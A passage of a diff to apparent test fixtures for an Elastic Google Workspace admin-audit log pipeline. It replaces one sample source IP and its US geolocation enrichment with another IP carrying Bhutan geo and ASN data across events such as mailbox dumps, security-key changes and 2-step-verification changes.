-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -2456,7 +2288,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DOWNLOAD_PENDING_INVITES_LIST\"}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DOWNLOAD_PENDING_INVITES_LIST\"}}",
         "event.provider": "admin",
         "event.type": [
             "info"
@@ -2467,26 +2299,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 18510,
+        "log.offset": 18468,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -2507,7 +2335,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REMOVE_RECOVERY_EMAIL\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REMOVE_RECOVERY_EMAIL\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -2520,27 +2348,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 18839,
+        "log.offset": 18796,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -2564,7 +2388,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REMOVE_RECOVERY_PHONE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REMOVE_RECOVERY_PHONE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -2577,27 +2401,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 19224,
+        "log.offset": 19180,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -2621,7 +2441,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REQUEST_ACCOUNT_INFO\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REQUEST_ACCOUNT_INFO\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "info",
@@ -2634,27 +2454,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 19609,
+        "log.offset": 19564,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -2680,7 +2496,7 @@
         "event.end": "2002-10-02T16:00:00.000Z",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REQUEST_MAILBOX_DUMP\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"BEGIN_DATE_TIME\",\"value\":\"2002-10-02T15:00:00Z\"},{\"name\":\"EMAIL_EXPORT_INCLUDE_DELETED\",\"value\":\"true\"},{\"name\":\"EMAIL_EXPORT_PACKAGE_CONTENT\",\"value\":\"contents\"},{\"name\":\"SEARCH_QUERY_FOR_DUMP\",\"value\":\"foo bar\"},{\"name\":\"END_DATE_TIME\",\"value\":\"2002-10-02T16:00:00Z\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REQUEST_MAILBOX_DUMP\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"BEGIN_DATE_TIME\",\"value\":\"2002-10-02T15:00:00Z\"},{\"name\":\"EMAIL_EXPORT_INCLUDE_DELETED\",\"value\":\"true\"},{\"name\":\"EMAIL_EXPORT_PACKAGE_CONTENT\",\"value\":\"contents\"},{\"name\":\"SEARCH_QUERY_FOR_DUMP\",\"value\":\"foo bar\"},{\"name\":\"END_DATE_TIME\",\"value\":\"2002-10-02T16:00:00Z\"}]}}",
         "event.provider": "admin",
         "event.start": "2002-10-02T15:00:00.000Z",
         "event.type": [
@@ -2697,27 +2513,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 19993,
+        "log.offset": 19947,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -2741,7 +2553,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"RESEND_USER_INVITE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"RESEND_USER_INVITE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "info",
@@ -2755,27 +2567,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 20656,
+        "log.offset": 20609,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -2799,7 +2607,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"RESET_SIGNIN_COOKIES\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"RESET_SIGNIN_COOKIES\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -2812,27 +2620,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 21083,
+        "log.offset": 21035,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -2856,7 +2660,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"SECURITY_KEY_REGISTERED_FOR_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"SECURITY_KEY_REGISTERED_FOR_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -2869,27 +2673,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 21467,
+        "log.offset": 21418,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -2913,7 +2713,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REVOKE_SECURITY_KEY\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REVOKE_SECURITY_KEY\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -2926,27 +2726,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 21863,
+        "log.offset": 21813,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -2970,7 +2766,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"USER_INVITE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"USER_INVITE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "info",
@@ -2984,27 +2780,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 22246,
+        "log.offset": 22195,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -3028,7 +2820,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"VIEW_TEMP_PASSWORD\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"VIEW_TEMP_PASSWORD\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "info",
@@ -3042,27 +2834,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 22666,
+        "log.offset": 22614,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -3086,7 +2874,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"TURN_OFF_2_STEP_VERIFICATION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"TURN_OFF_2_STEP_VERIFICATION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
